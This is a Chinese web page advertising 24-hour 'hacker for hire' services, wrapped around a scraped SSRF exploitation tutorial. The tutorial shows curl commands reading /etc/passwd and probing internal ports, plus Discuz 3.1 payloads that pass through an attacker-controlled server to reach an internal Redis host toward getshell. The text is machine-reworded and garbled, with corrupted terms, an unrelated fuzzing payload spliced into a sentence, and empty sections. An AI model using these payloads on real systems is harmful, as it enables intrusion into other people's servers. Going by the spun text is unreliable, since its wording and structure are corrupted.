黑客24小时在线接单定位_黑客在线接单:SSRF缝隙使用与getshell实战

作者: admin 分类: 新闻动态 发布时间: 2022-07-01 15:30

  什么是SSRF?

  SSRF(Server-Side Request Forgery,服运用inputUsername=百分之25百分之32百分之61百分之25百分之32百分之39百分之25百分之32百分之39百分之25百分之32百分之38百分之25百分之37百分之63百分之25百分之32百分之38§uid§百分之25百分之33百分之64百分之25百分之32百分之61&inputOTP=1234进行参数fuzz务器端恳求假造)是一种由侵犯者结构恳求,运用服务器端建议的安全缝隙。一般情况下,SSRF侵犯的政策是外网无法拜访的内部系统(正因为恳求是由服务器端建议的,所以服务器能恳求到与本身相连而外网阻隔的内部系统)。

  Example:

  GET /index.php?url=http://google.com/ HTTP/1.1

  Host: example.com

  在这儿,http://example.com从它的服务器获取http://google.com

  

  目录

  0X00 SSRF的类型

  0X01 什么当地最简略出现SSRF

  0X02 SSRF缝隙的损害

  0X03 SSRF神器Curl的运用

  0X04 最常用的跳转绕过

  0X05 Python+SSRF完结端口扫描

  0X06 运用Discuz的SSRF缝隙GetShell

  0X07 简略的绕过SSRF图片的约束

  0X08 或许遇到的问题

  0X09 常用发掘SSRF缝隙的东西

  0X00 SSRF的类型

  1. 显现侵犯者的呼应(Basic)

  2. 不显现呼应(Blind)

  0X01 什么当地最简略出现SSRF

  云服务器商。(各种网站数据库操作)

  有远程图片加载的当地。(编辑器之类的有远程图片加载啊)

  网站收集、网页抓取的当地。(许多网站会有新闻收集输入url然后一键收集)

  头像的当地。(某易就喜爱远程加载头像,例如:https://www.xxxx.com/image?url=http://www.image.com/1.jpg)

  最终一个全部要你输入网址的当地和可以输入ip的都放,都是ssrf的全国。

  0X02 SSRF缝隙的损害

  对服务器地点的内网进行端口扫描,获取一些服务的banner信息等

  侵犯作业在内网或许本地的运用程序

  对内网WEB运用进行指纹识别,通过拜访默许文件完结(Readme等文件)

  侵犯内外网的WEB运用,首要是GET就可以完结的侵犯(比如Struts2,SQL注

本渗透检验练习供应专门的练习途径,我们可以在pentesterLab中下载VM镜像,还可以读一下原文英文教程。入等)

  下载内网资源(运用file协议读取本地文件等)

  运用Redis未授权拜访,HTTP CRLF注入到达getshell

  wooyun峰会猪猪侠的ppt

  进行跳板

  无视cdn

  0X03 SSRF神器Curl的运用

  检查curl支撑的协议列表 #curl--config –protocols

  运用curl读取文件

  curl -v file:///etc/passwd

  运用ftp协议

  curl -v "ftp://127.0.0.1:6666/info"

  运用dict协议

  curl -v "dict://127.0.0.1:6666/info"

  运用gopher协议

  curl -v "gopher://127.0.0.1:6666/_info"

  0X04最常用的跳转绕过

  

  0X05 Python+SSRF完结端口扫描

  简略的端口扫描

  

  一起调查Wireshark整个扫描流程

  

  代码完结:

  

  验证本地是否敞开了相应的端口

  

  Python代码编写的思路:

  端口存在衔接会一直在衔接,衔接时间会很长。

  

  端口不存在的衔接会被立马改写

  

  0X06 运用Discuz的SSRF缝隙GetShell

  Discuz无条件约束ssrf缝隙(<=3.1检验是有这个缝隙)

  试验环境:

  172.28.100.109 为Discuz 3.1(Win10),172.28.100.108为Redis服务器(CentOS),hacker.xxxx.com为公网检验服务器首要寄存ssrf用的php文件

  Discuz3.1下载地址:

  http://www.comsenz.com/downloads/install/discuzx#down_open

  

  示例:

  /forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?s=dict百分之26ip=172.28.100.10OpenVPN8百分之26port=6666百分之26data=hello.jpg[/img]

  实际运用payload:

  http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://hacker.xxxx.com/ssrf.php?s=ftp百分之26ip=172.28.100.108百分之26port=6666百分之26data=he2lo.jpg[/img]

  运用nc来检验SSRF缝隙

  http://127.0.0.1/Discuz_X3.1/upload/forum.php?mod=ajax&action=downremoteimg&message=[img]http://172.28.100.108:6666/?data=root.jpg[/img]

  

  tcpdump抓包看到Discuz发来的数据包

  

  nc也有反响了

  

  底子可以承认这儿是有SSRF缝隙

  运用header 来合作ssrf缝隙运用,在我公网服务器放了一个ssrf.php

  

更多阅读